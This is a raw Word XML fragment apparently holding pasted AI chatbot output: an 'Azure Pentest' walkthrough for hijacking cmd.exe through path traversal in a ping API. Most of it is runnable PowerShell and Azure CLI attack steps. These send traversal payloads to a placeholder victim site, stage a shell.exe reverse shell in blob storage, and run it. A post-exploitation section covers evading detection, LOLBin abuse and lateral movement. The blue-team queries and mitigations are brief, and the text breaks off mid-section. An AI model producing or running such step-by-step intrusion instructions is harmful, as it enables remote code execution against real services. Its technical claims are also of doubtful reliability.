          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>reverse shell payload generator</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>web shell validator</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> next?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD3432" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2819FC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Great — based on your goals, I’ll restructure the cmd.exe path traversal (CMD Hijack) vulnerability into an actionable </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> format using </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell and Azure CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, and explain each step clearly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679BEC0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3A689CDD">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77979C4B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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Vector: CMD Hijack via Argument Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53F391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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3C124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This attack exploits Windows' cmd.exe parsing behavior with improperly sanitized inputs in web apps or services calling cmd.exe /c "&lt;user input&gt;". If the input isn't quoted or validated, an attacker can force cmd.exe to interpret the argument as a full path to a malicious executable (e.g., calc.exe instead of ping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C055626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⛏️</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Pentesting Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6C201" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Windows-based Azure VM or App Service using cmd.exe to spawn commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D5DCE" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Web app or API that executes commands from user input (e.g., ping, tracert) using cmd.exe /c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD47F93" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Exploit path traversal to achieve RCE or spawn reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F1F25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5A569C08">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA81C5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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step-by-Step Exploitation Using PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1264D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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 1: Confirm Command Injection Possibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287399A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Invoke-WebRequest -Uri "http://victim.azurewebsites.net/api/ping?ip=127.0.0.1" -UseBasicParsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9BCC9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If the response reflects ping results, it's likely the API spawns cmd.exe /c "ping &lt;user_input&gt;".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C3DD0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47ACBF44">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C49C0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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 2: Craft the Malicious Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391627E3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You try to replace ping with an actual path to a binary (like calc.exe, nc.exe, or reverse shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220500D7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# Windows system utility abuse via path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FDF59F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$payload = "127.0.0.1/../../../../../../../../windows/system32/calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4B379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Invoke-WebRequest -Uri "http://victim.azurewebsites.net/api/ping?ip=$payload" -UseBasicParsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E25F336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If successful, this will launch calc.exe (POC). Replace with reverse shell binary for real RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F038AF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49325DCF">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB51CA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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 3: Upload Reverse Shell Binary to Azure VM (If You Have Write Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D7F69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# Upload using AzCopy or PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DAE7F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az storage blob upload --account-name mystorage --container-name payloads --name shell.exe --file shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BFF54" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EEEE0B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# From VM shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EDC24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Invoke-WebRequest -Uri "https://&lt;storage-account&gt;.blob.core.windows.net/payloads/shell.exe" -OutFile "C:\Windows\Temp\shell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFFF2A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2C459A54">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC9691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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 4: Execute Reverse Shell via Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57192E3D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$payload = "127.0.0.1/../../../../../../../../windows/temp/shell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0FB3D9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Invoke-WebRequest -Uri "http://victim.azurewebsites.net/api/ping?ip=$payload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017375EF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053E50FA">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45800D18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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 5: Hardened Detection (Blue Team Notes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C831F32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You can use PowerShell to audit unsafe usage of cmd.exe /c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D509F6D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Get-WinEvent -LogName "Security" | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0900DF69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    $_.Message -like "*cmd.exe /c*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01876536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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42428695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Or search via Defender logs in Azure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31E44A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# Defender for Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FA7E0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DeviceProcessEvents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A810AB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| where FileName =~ "cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F945739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>| where ProcessCommandLine has "/c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2FD27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42B52CBC">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="071673AC" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigations for Defenders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360514C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Always use escapeshellarg() (not just escapeshellcmd()) in code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B92D9" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Enforce input sanitization and wrap parameters in quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DD5830" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Disallow direct use of user input in command-line contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CFC9B" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="3B81FEB1">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3B7F9" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Would you like me to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell module</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that scans for this type of command injection and path traversal behavior in Azure-hosted apps?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175BA6C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7DC1D0" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8116B7" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381645"/>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Azure Post-Exploitation: CMD Argument Hijacking and LOLBin Abuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="66512F43" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538F13CD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 xml:space="preserve">Here’s a rewritten, corrected, and detailed summary tailored for an </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure penetration testing context</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, focusing on how this technique applies to cloud-hosted Windows systems (e.g., Azure VMs) and its implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F77FFB" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="05149057">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF59839" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Post-Exploitation: CMD Argument Hijacking and LOLBin Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDACF4" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A non-CVE “technique” that enables execution hijacking via cmd.exe /c argument manipulation combined with path traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40FC36" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="00F20A63">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1868EC" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E269D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 xml:space="preserve">This technique leverages how cmd.exe processes arguments passed to it via /c. The behavior allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-like behavior and, with the right circumstances, </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via manipulation of relative paths and misuse of Windows LOLBins (Living Off the Land Binaries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379C18B2" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use Case in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C3F53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 xml:space="preserve">Once you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>code execution or a foothold in an Azure Windows VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via RCE, credential theft, misconfigured Run Command, or other means), this technique can help you:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C64B1D" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Evade basic detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C6A08" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Execute payloads using trusted binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC8E38" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Pivot laterally within the VM or network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8E7F6" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Elevate privileges indirectly (if used in scheduled tasks, service configs, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7BEAF" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="608534F4">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BAEBDC" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step-by-Step Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F717D0" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Understanding CMD's Parsing Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13594595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When using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF0F63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cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E33E3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 xml:space="preserve">The cmd.exe interpreter attempts to treat the string as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, starting from the current working directory. It performs </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>path normalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, removing segments like ../, and will </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>resolve and execute the resultant executable</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (here: calc.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36696D06" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>❗</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
